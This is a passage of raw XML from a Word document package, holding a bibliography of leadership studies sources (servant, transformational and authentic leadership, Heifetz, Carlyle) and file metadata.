    <b:Title>Public Service Leadership: Emerging Issues, A report for the Australian Public Service </b:Title>
    <b:Year>2003</b:Year>
    <b:City>Canberra</b:City>
    <b:Publisher>Australian Public Service Commission</b:Publisher>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Edwards</b:Last>
            <b:First>Meredith</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Ayres</b:Last>
            <b:First>Russell</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Howard</b:Last>
            <b:First>Cosmo</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>37</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Gre13</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{34BA6C49-81E0-4F19-880C-D18838ADAA4D}</b:Guid>
    <b:Title>Robert K Greenleaf Center for Servant Leadership</b:Title>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Greenleaf</b:Last>
            <b:First>Robert</b:First>
            <b:Middle>K</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:YearAccessed>2013</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>5</b:DayAccessed>
    <b:URL>https://www.greenleaf.org/what-is-servant-leadership/</b:URL>
    <b:RefOrder>38</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>McC13</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{3187FA4B-B077-41E6-9143-3B0DB74139AF}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>McCrimmon</b:Last>
            <b:First>Mitch</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>lead2xl.com</b:Title>
    <b:YearAccessed>2013</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>5</b:DayAccessed>
    <b:URL>http://www.lead2xl.com/heifetz-on-leadership.html</b:URL>
    <b:RefOrder>19</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Noh10</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Guid>{5456A9E8-03D8-4B0E-BB8E-B8E3C2A3F7B2}</b:Guid>
    <b:Title>Handbook of Leadership Theory and Practice</b:Title>
    <b:Year>2010</b:Year>
    <b:Publisher>Harvard Business School Publishing Corporation</b:Publisher>
    <b:City>Cambridge</b:City>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Nohria</b:Last>
            <b:First>Nitin</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Khurana</b:Last>
            <b:First>Rakesh</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>39</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Kuh87</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{0277B1C3-E32E-42F9-B117-CD00D2042657}</b:Guid>
    <b:Title>Transactional and Transformational Leadership: A Constructive/Developmental Analysis</b:Title>
    <b:Year>1987</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Kuhnert</b:Last>
            <b:First>Kark</b:First>
            <b:Middle>W</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Lewis</b:Last>
            <b:First>Philip</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>The Academy of Management Review</b:JournalName>
    <b:Pages>648-657</b:Pages>
    <b:Volume>12</b:Volume>
    <b:Issue>4</b:Issue>
    <b:RefOrder>11</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Bas99</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{4A2B042E-AFF5-4B62-962E-6B59C68D3CC6}</b:Guid>
    <b:Title>Ethics, Character, and Authentic Transformational Leadership Behavior</b:Title>
    <b:Year>1999</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Bass</b:Last>
            <b:First>Bernard</b:First>
            <b:Middle>M</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Steidlmeier</b:Last>
            <b:First>Paul</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>The Leadership Quarterly</b:JournalName>
    <b:Pages>181-217</b:Pages>
    <b:Volume>10</b:Volume>
    <b:Issue>2</b:Issue>
    <b:RefOrder>13</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Wil11</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{9E378DF6-C7CD-436B-B80E-C8511FD69CD6}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Gardner</b:Last>
            <b:First>William</b:First>
            <b:Middle>L</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Cogliser</b:Last>
            <b:First>Claudia</b:First>
            <b:Middle>C</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Davis</b:Last>
            <b:First>Kelly</b:First>
            <b:Middle>M</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Dickens</b:Last>
            <b:First>Matthew</b:First>
            <b:Middle>P</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Authentic leadership: A review of the literature and research agenda</b:Title>
    <b:JournalName>The Leadership Quarterly</b:JournalName>
    <b:Year>2011</b:Year>
    <b:Pages>1120-1145</b:Pages>
    <b:Volume>22</b:Volume>
    <b:Issue>6</b:Issue>
    <b:RefOrder>40</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Geo12</b:Tag>
    <b:SourceType>BookSection</b:SourceType>
    <b:Guid>{2214F25B-ADC9-4366-9421-6519D405D4C4}</b:Guid>
    <b:Title>Authentic Leadership Development</b:Title>
    <b:Year>2012</b:Year>
    <b:Pages>313-327</b:Pages>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>George</b:Last>
            <b:First>Bill</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
      <b:Editor>
        <b:NameList>
          <b:Person>
            <b:Last>Snook</b:Last>
            <b:First>Scott</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Nohria</b:Last>
            <b:First>Nitin</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Khurana</b:Last>
            <b:First>Rakesh</b:First>
          </b:Person>
        </b:NameList>
      </b:Editor>
    </b:Author>
    <b:BookTitle>The Handbook for Teaching Leadership: Knowing, Doing, and Being</b:BookTitle>
    <b:City>Thousand Oaks</b:City>
    <b:Publisher>SAGE Publications, Inc</b:Publisher>
    <b:RefOrder>14</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Gar11</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{35031D5D-6CBC-4F95-85B6-0D34103561D8}</b:Guid>
    <b:Title>A Critique of the Discourse of Authentic Leadership</b:Title>
    <b:Year>2011</b:Year>
    <b:Pages>99-104</b:Pages>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Gardiner</b:Last>
            <b:First>Rita</b:First>
            <b:Middle>A</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>International Journal of Business and Social Science</b:JournalName>
    <b:Volume>2</b:Volume>
    <b:Issue>15</b:Issue>
    <b:RefOrder>15</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Boy11</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{9B19D3A5-2AC7-4FF2-89B4-1601F295932B}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Boyatzis</b:Last>
            <b:First>Richard</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Neuroscience and Leadership: The Promise of Insights</b:Title>
    <b:JournalName>Ivey Business Journal Online</b:JournalName>
    <b:Year>2011</b:Year>
    <b:Issue>January/February</b:Issue>
    <b:RefOrder>23</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Rin12</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{814D70E6-B51A-407B-BC24-0F1EC7235643}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Ringleb</b:Last>
            <b:First>A.</b:First>
            <b:Middle>H.</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Rock</b:Last>
            <b:First>D.</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Ancona</b:Last>
            <b:First>C.</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>NeuroLeadership in 2011 and 2012</b:Title>
    <b:JournalName>NeuroLeadership Journal</b:JournalName>
    <b:Year>2012</b:Year>
    <b:Volume>4</b:Volume>
    <b:RefOrder>24</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Car41</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Guid>{841FAA4B-3563-48E6-B4DB-A8B30A36EB7B}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Carlyle</b:Last>
            <b:First>Thomas</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>On Heroes, Hero-worship, and the Heroic in History</b:Title>
    <b:Year>1841</b:Year>
    <b:Publisher>James Fraser</b:Publisher>
    <b:RefOrder>5</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Hei11</b:Tag>
    <b:SourceType>BookSection</b:SourceType>
    <b:Guid>{D5613661-057A-41AD-BA82-7A120E658CF0}</b:Guid>
    <b:Title>The Work of Leadership</b:Title>
    <b:Year>2011</b:Year>
    <b:Pages>57-78</b:Pages>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Heifetz</b:Last>
            <b:First>Ronald</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Laurie</b:Last>
            <b:First>Donald</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:BookTitle>HBR's 10 Must Reads: On Leadership</b:BookTitle>
    <b:City>Boston</b:City>
    <b:Publisher>Harvard Business Review Press</b:Publisher>
    <b:RefOrder>18</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Placeholder1</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Guid>{17E1CE45-862C-4749-85A8-60F04FE91AC4}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Carlyle</b:Last>
            <b:First>Thomas</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>On Heroes, Hero-worship, and the Heroic in History</b:Title>
    <b:Year>1841</b:Year>
    <b:Publisher>Sterling Edition??</b:Publisher>
    <b:RefOrder>41</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Placeholder2</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{B995E481-96A8-4AFA-9A09-546AD97A6121}</b:Guid>
    <b:Title>Ethics, Character, and Authentic Transformational Leadership Behavior</b:Title>
    <b:Year>1999</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Bass</b:Last>
            <b:First>Bernard</b:First>
            <b:Middle>M and Steidlmeier, Paul</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>The Leadership Quarterly </b:JournalName>
    <b:Pages>181-217</b:Pages>
    <b:Volume>10</b:Volume>
    <b:Issue>2</b:Issue>
    <b:RefOrder>42</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B5087B13-72C6-4989-BB21-1252840F4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5394</Words>
  <Characters>30748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2014-01-06T03:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-04-18T01:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>